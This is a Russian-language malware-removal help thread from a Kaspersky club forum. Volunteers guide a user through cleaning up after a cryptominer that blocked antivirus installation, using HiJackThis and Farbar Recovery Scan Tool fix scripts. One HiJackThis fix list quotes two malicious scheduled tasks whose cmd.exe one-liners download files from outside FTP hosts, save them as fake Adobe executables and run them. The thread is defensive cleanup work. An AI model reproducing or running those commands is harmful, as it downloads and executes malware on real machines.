artembogdanov1985 0 Опубликовано 9 апреля, 2022 Share Опубликовано 9 апреля, 2022 не запускается установщик касперский интернет секурити, ранее был обнаружен майнер и удален с помощью drweb cureit. AVbr не устанавливается. CollectionLog-2022.04.09-17.23.zip Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 9 апреля, 2022 Share Опубликовано 9 апреля, 2022 Здравствуйте! Скачайте AV block remover. Распакуйте, запустите и следуйте инструкциям. После перезагрузки системы соберите новый CollectionLog Автологером.Важно: если файл AVbr.exe не запуститься, то переименуйте его, возможно майнер заблокировал это название файла. Ссылка на сообщение Поделиться на другие сайты
artembogdanov1985 0 Опубликовано 9 апреля, 2022 Автор Share Опубликовано 9 апреля, 2022 5 часов назад, SQ сказал: Здравствуйте! Скачайте AV block remover. Распакуйте, запустите и следуйте инструкциям. После перезагрузки системы соберите новый CollectionLog Автологером.Важно: если файл AVbr.exe не запуститься, то переименуйте его, возможно майнер заблокировал это название файла. да, после переименования avbr запустился, после этого уже запустился и кис. CollectionLog-2022.04.10-00.53.zip Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 10 апреля, 2022 Share Опубликовано 10 апреля, 2022 Здравствуйте, HiJackThis (из каталога autologger)профикситьВажно: необходимо отметить и профиксить только то, что указано ниже. O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A7B60AA-BA42-409F-BC97-7BCFEFAD6308} - (no key) O22 - Task: \Microsoft\Windows\Shell\IndexerAutomaticMaintenance - {3FBA60A6-7BF5-4868-A2CA-6623B3DFFEA6} - (no file) O22 - Task: AdobeUpdateFlac - C:\Windows\system32\cmd.exe /c echo open ftp2.ha7455h6fi1.net>>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.rar c:\windows\Adobeupdate.exe>>s&echo bye>>s&ftp -s:s&c:\windows\Adobeupdate.exe O22 - Task: AdobeUpdateFlac2 - C:\Windows\system32\cmd.exe /c echo open ftp2.webpublicservices.org>>ps&echo test>>ps&echo 1433>>ps&echo get c.rar c:\windows\help\AdobeFlac.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\AdobeFlac.exe Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что под окном Optional Scan отмечены "List BCD" , "SigCheckExt" и "90 Days Files". Нажмите кнопку Scan. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении. Ссылка на сообщение Поделиться на другие сайты
artembogdanov1985 0 Опубликовано 10 апреля, 2022 Автор Share Опубликовано 10 апреля, 2022 12 часов назад, SQ сказал: Здравствуйте! Скачайте AV block remover. Распакуйте, запустите и следуйте инструкциям. После перезагрузки системы соберите новый CollectionLog Автологером.Важно: если файл AVbr.exe не запуститься, то переименуйте его, возможно майнер заблокировал это название файла. да, после переименования avbr запустился, после этого уже запустился и кис. FRST.txt Addition.txt Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 11 апреля, 2022 Share Опубликовано 11 апреля, 2022 Закройте и сохраните все открытые приложения. Выделите следующий код:: Start:: CreateRestorePoint: HKU\S-1-5-19\...\Run: [OneDriveSetup] => C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (Нет файла) HKU\S-1-5-20\...\Run: [OneDriveSetup] => C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (Нет файла) Task: {9CF28ADB-B3BF-4D48-93F0-02F9859DB747} - System32\Tasks\unityplayeer => c:\users\артем\appdata\roaming\unityplayeer.exe (Нет файла) <==== ВНИМАНИЕ File: c:\windows\Adobeupdate.exe File: c:\windows\help\AdobeFlac.exe File: C:\Windows\SysWOW64\calc1.exe FirewallRules: [{EC89026D-1BED-4F5C-A965-583B95CD8311}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла FirewallRules: [{6102F3D1-D4D3-486E-91A1-D3063437738F}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла FirewallRules: [{229697C9-FDBA-40D7-BFCF-ACD0962CBCB2}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла FirewallRules: [{FC6DBB86-D06B-4F31-903C-7143A90F3478}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла FirewallRules: [{FE8F086B-34C5-4492-87A9-DA77515D33C6}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла FirewallRules: [{B0C4ECB6-8621-4DDA-8474-4B47CC8EE21C}] => (Allow) C:\Users\Артем\Desktop\AnyDesk.exe => Нет файла FirewallRules: [{2395DDCA-1AB9-4B29-ABDD-8D5E69DD7D87}] => (Allow) E:\Red Dead Redemption 2\RDR2.exe => Нет файла FirewallRules: [{47F9C47B-68B3-4682-B7B3-7FEFA6663962}] => (Allow) E:\Red Dead Redemption 2\RDR2.exe => Нет файла FirewallRules: [TCP Query User{E774E56A-8489-45CA-8A23-66FB05CCE59E}E:\need for speed(tm) most wanted\nfs13.exe] => (Allow) E:\need for speed(tm) most wanted\nfs13.exe => Нет файла FirewallRules: [UDP Query User{AA69735A-EA24-48EF-BB63-7CA145824820}E:\need for speed(tm) most wanted\nfs13.exe] => (Allow) E:\need for speed(tm) most wanted\nfs13.exe => Нет файла FirewallRules: [TCP Query User{B27319A1-1B6C-493D-9629-B0D051939B67}H:\fallout.76.tricentennial.edition\games\fallout76\fallout76.exe] => (Allow) H:\fallout.76.tricentennial.edition\games\fallout76\fallout76.exe => Нет файла FirewallRules: [UDP Query User{0E655565-B6D6-4436-9A94-B25141B173D9}H:\fallout.76.tricentennial.edition\games\fallout76\fallout76.exe] => (Allow) H:\fallout.76.tricentennial.edition\games\fallout76\fallout76.exe => Нет файла FirewallRules: [TCP Query User{A8CB93BD-EB80-45D0-B9EF-FB922930B907}H:\heavy.rain.egs.rip-insaneramzes\heavyrain\heavyrain.exe] => (Allow) H:\heavy.rain.egs.rip-insaneramzes\heavyrain\heavyrain.exe => Нет файла FirewallRules: [UDP Query User{0DCD8F0C-F0FE-42E7-835A-D275F54DCA83}H:\heavy.rain.egs.rip-insaneramzes\heavyrain\heavyrain.exe] => (Allow) H:\heavy.rain.egs.rip-insaneramzes\heavyrain\heavyrain.exe => Нет файла FirewallRules: [TCP Query User{D7D0CD1C-8BF8-4E9A-B811-4DC1A98015AD}D:\games\fuser\fuser\binaries\win64\fusereos-win64-shipping.exe] => (Allow) D:\games\fuser\fuser\binaries\win64\fusereos-win64-shipping.exe => Нет файла FirewallRules: [UDP Query User{487B1715-C47D-4E07-957D-6AAEBBEF2E10}D:\games\fuser\fuser\binaries\win64\fusereos-win64-shipping.exe] => (Allow) D:\games\fuser\fuser\binaries\win64\fusereos-win64-shipping.exe => Нет файла End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST/FRST64 (от имени администратора). Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Обратите внимание, что компьютер будет возможно перезагружен. Сообщите что с проблемой? Ссылка на сообщение Поделиться на другие сайты
artembogdanov1985 0 Опубликовано 12 апреля, 2022 Автор Share Опубликовано 12 апреля, 2022 спасибо большое, проблема решена. очень рад, что есть такое сообщество, где могут помочь с такими проблема как эта. Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 12 апреля, 2022 Share Опубликовано 12 апреля, 2022 11.04.2022 в 06:18, SQ сказал: Программа создаст лог-файл (Fixlog.txt). Прикрепите этот файл, пожалуйста. Ссылка на сообщение Поделиться на другие сайты
artembogdanov1985 0 Опубликовано 12 апреля, 2022 Автор Share Опубликовано 12 апреля, 2022 Fixlog.txt Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 13 апреля, 2022 Share Опубликовано 13 апреля, 2022 Завершающие шаги: Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.Компьютер перезагрузится. Остальные утилиты лечения и папки можно просто удалить. 2. Проверьте уязвимые места и устаревшее критическое ПО: Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10) Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работуДождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt Прикрепите этот файл к своему следующему сообщению. Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 18 апреля, 2022 Share Опубликовано 18 апреля, 2022 Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в Турцию, Армению, Сочи, Камбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского". Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения